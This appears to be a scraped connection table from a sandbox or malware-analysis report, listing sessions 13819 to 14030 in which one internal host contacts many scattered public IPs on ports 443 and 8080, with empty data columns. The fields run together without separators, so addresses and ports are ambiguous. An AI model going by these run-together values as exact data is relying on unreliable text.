                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13819192.168.2.1435818112.221.76.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13820192.168.2.1454086170.46.81.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13821192.168.2.1452934170.132.38.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13822192.168.2.1442504182.240.217.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13823192.168.2.1451714117.143.10.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13824192.168.2.1455234202.2.10.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13825192.168.2.144632436.42.118.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13826192.168.2.1447422112.100.60.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13827192.168.2.1434870148.207.190.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13828192.168.2.1455614131.103.92.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13829192.168.2.1440078157.136.248.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13830192.168.2.1458728137.119.145.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13831192.168.2.1439456139.61.112.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13832192.168.2.1448242107.146.152.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13833192.168.2.1450044160.52.5.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13834192.168.2.143934414.18.52.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13835192.168.2.145432891.120.163.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13836192.168.2.1441946193.165.235.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13837192.168.2.1436952111.209.61.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13838192.168.2.1453110221.88.12.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13839192.168.2.144590451.162.227.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13840192.168.2.143821488.255.169.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13841192.168.2.1444076139.14.35.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13842192.168.2.1445366159.33.134.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13843192.168.2.1460274104.18.222.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13844192.168.2.1453768140.125.36.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13845192.168.2.1447016161.182.166.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13846192.168.2.1448090115.149.207.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13847192.168.2.1435048117.193.95.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13848192.168.2.1434040212.146.168.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13849192.168.2.144836892.39.45.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13850192.168.2.1436432115.176.242.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13851192.168.2.1441742165.151.119.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13852192.168.2.14522088.62.219.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13853192.168.2.1433446129.5.183.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13854192.168.2.1445652120.113.222.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13855192.168.2.1456616187.160.164.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13856192.168.2.145290625.173.251.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13857192.168.2.1437542198.79.125.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13858192.168.2.1460522115.206.30.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13859192.168.2.14538085.117.151.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13860192.168.2.1460932195.252.138.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13861192.168.2.1458016219.115.28.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13862192.168.2.1439574130.172.212.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13863192.168.2.143605083.74.62.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13864192.168.2.1454782202.50.250.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13865192.168.2.14343522.154.80.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13866192.168.2.1448354170.192.131.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13867192.168.2.1444694114.37.235.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13868192.168.2.143662640.62.49.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13869192.168.2.1454056151.132.0.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13870192.168.2.144397082.102.11.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13871192.168.2.1440710211.199.38.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13872192.168.2.145447051.7.178.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13873192.168.2.144714270.223.88.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13874192.168.2.144226842.115.182.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13875192.168.2.1456146206.166.20.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13876192.168.2.143492684.74.119.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13877192.168.2.143792294.72.180.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13878192.168.2.1441276207.157.19.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13879192.168.2.144757072.218.214.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13880192.168.2.145307279.62.0.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13881192.168.2.143973050.211.216.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13882192.168.2.1442386148.174.147.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13883192.168.2.1438042211.59.5.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13884192.168.2.1438560129.134.157.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13885192.168.2.1433838222.231.10.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13886192.168.2.145063619.22.71.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13887192.168.2.143865419.186.49.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13888192.168.2.145339270.94.206.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13889192.168.2.143381864.63.109.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13890192.168.2.144476425.218.193.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13891192.168.2.143458617.241.83.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13892192.168.2.1443612143.199.7.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13893192.168.2.143423227.98.36.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13894192.168.2.145382067.58.164.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13895192.168.2.1439886134.230.178.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13896192.168.2.1458654181.150.166.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13897192.168.2.145028220.66.241.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13898192.168.2.1434498166.169.80.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13899192.168.2.144913274.252.246.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13900192.168.2.1438566109.36.69.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13901192.168.2.144705892.117.106.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13902192.168.2.1443946121.153.177.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13903192.168.2.145439014.69.38.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13904192.168.2.1441598110.78.87.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13905192.168.2.145477053.130.242.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13906192.168.2.1434516147.222.61.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13907192.168.2.1444874207.207.33.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13908192.168.2.143285035.8.101.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13909192.168.2.1454392170.217.211.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13910192.168.2.1437790128.51.92.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13911192.168.2.1446428157.255.90.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13912192.168.2.146033044.159.42.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13913192.168.2.144663458.29.129.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13914192.168.2.1439838147.229.101.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13915192.168.2.144268820.30.86.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13916192.168.2.1459490203.165.5.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13917192.168.2.143432057.48.229.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13918192.168.2.143434062.113.248.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13919192.168.2.1460922221.203.222.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13920192.168.2.1448612204.249.235.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13921192.168.2.1445252106.165.160.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13922192.168.2.1433402220.210.76.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13923192.168.2.145561847.163.192.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13924192.168.2.143862648.200.33.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13925192.168.2.1452318186.6.215.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13926192.168.2.1450640216.5.133.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13927192.168.2.1445218169.104.72.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13928192.168.2.1452690152.126.151.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13929192.168.2.1436096145.85.160.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13930192.168.2.144598871.65.16.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13931192.168.2.144365824.154.107.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13932192.168.2.144957688.126.58.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13933192.168.2.1449552150.131.76.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13934192.168.2.143853823.5.9.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13935192.168.2.145951274.126.166.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13936192.168.2.1440674139.62.61.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13937192.168.2.145975249.125.60.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13938192.168.2.145653820.69.33.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13939192.168.2.1437500170.198.184.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13940192.168.2.1460350147.28.211.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13941192.168.2.145826094.245.91.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13942192.168.2.145916496.125.32.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13943192.168.2.143725896.143.246.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13944192.168.2.1454848201.91.68.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13945192.168.2.144288617.251.170.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13946192.168.2.143358677.187.217.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13947192.168.2.143588458.2.89.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13948192.168.2.1459038135.60.241.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13949192.168.2.144416236.239.39.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13950192.168.2.146077052.251.32.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13951192.168.2.1438124110.60.255.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13952192.168.2.143443843.222.164.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13953192.168.2.1445392198.215.162.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13954192.168.2.1438414208.238.7.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13955192.168.2.1447530192.4.225.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13956192.168.2.145191452.217.214.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13957192.168.2.144591683.20.15.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13958192.168.2.1449362108.161.88.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13959192.168.2.1457262141.61.129.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13960192.168.2.1454406163.245.241.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13961192.168.2.1449448110.42.89.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13962192.168.2.1460138169.169.30.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13963192.168.2.1436426196.252.156.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13964192.168.2.144219443.205.198.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13965192.168.2.1435544108.215.164.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13966192.168.2.1438748143.230.218.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13967192.168.2.1448250163.69.192.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13968192.168.2.1442822106.39.208.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13969192.168.2.145726085.132.51.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13970192.168.2.143757235.149.101.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13971192.168.2.1443352143.32.42.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13972192.168.2.145523257.203.216.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13973192.168.2.1447826195.125.163.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13974192.168.2.145712293.25.185.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13975192.168.2.1437064176.136.46.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13976192.168.2.1452198141.217.241.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13977192.168.2.143969298.84.59.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13978192.168.2.145725217.56.205.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13979192.168.2.1447812143.121.130.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13980192.168.2.1448566107.253.247.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13981192.168.2.145067497.40.0.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13982192.168.2.146045640.93.21.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13983192.168.2.1449452165.147.56.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13984192.168.2.143657012.71.176.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13985192.168.2.144895640.91.107.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13986192.168.2.14449769.136.9.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13987192.168.2.1440082180.92.77.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13988192.168.2.143479257.159.117.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13989192.168.2.1447296123.197.238.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13990192.168.2.143811284.104.41.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13991192.168.2.1456878196.52.118.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13992192.168.2.143432640.33.233.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13993192.168.2.1445914221.239.239.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13994192.168.2.144268468.177.138.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13995192.168.2.1460528153.55.189.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13996192.168.2.143323244.6.220.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13997192.168.2.1440418188.150.138.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13998192.168.2.1460780170.180.94.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13999192.168.2.146015425.161.170.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14000192.168.2.1435620166.165.138.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14001192.168.2.143400463.237.195.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14002192.168.2.144306495.69.23.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14003192.168.2.1452144116.213.141.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14004192.168.2.145514842.159.165.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14005192.168.2.1456714216.131.224.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14006192.168.2.1435870129.67.138.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14007192.168.2.145254638.202.3.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14008192.168.2.144885054.92.241.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14009192.168.2.1458458149.196.115.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14010192.168.2.143793266.44.50.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14011192.168.2.1460130190.87.16.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14012192.168.2.1434126185.110.240.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14013192.168.2.1456186133.218.183.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14014192.168.2.145090434.169.245.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14015192.168.2.1448092112.21.213.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14016192.168.2.1434684196.8.66.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14017192.168.2.1444468203.250.192.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14018192.168.2.1441726166.2.174.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14019192.168.2.144797877.183.185.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14020192.168.2.1460084218.47.188.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14021192.168.2.143442462.47.145.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14022192.168.2.1432912166.71.217.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14023192.168.2.1445642196.7.41.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14024192.168.2.145146431.85.117.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14025192.168.2.1439580168.39.196.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14026192.168.2.145780065.2.110.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14027192.168.2.144877020.226.21.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14028192.168.2.143861654.246.7.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14029192.168.2.1436930119.60.13.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14030192.168.2.143610488.195.121.238443
                                                        TimestampBytes transferredDirectionData


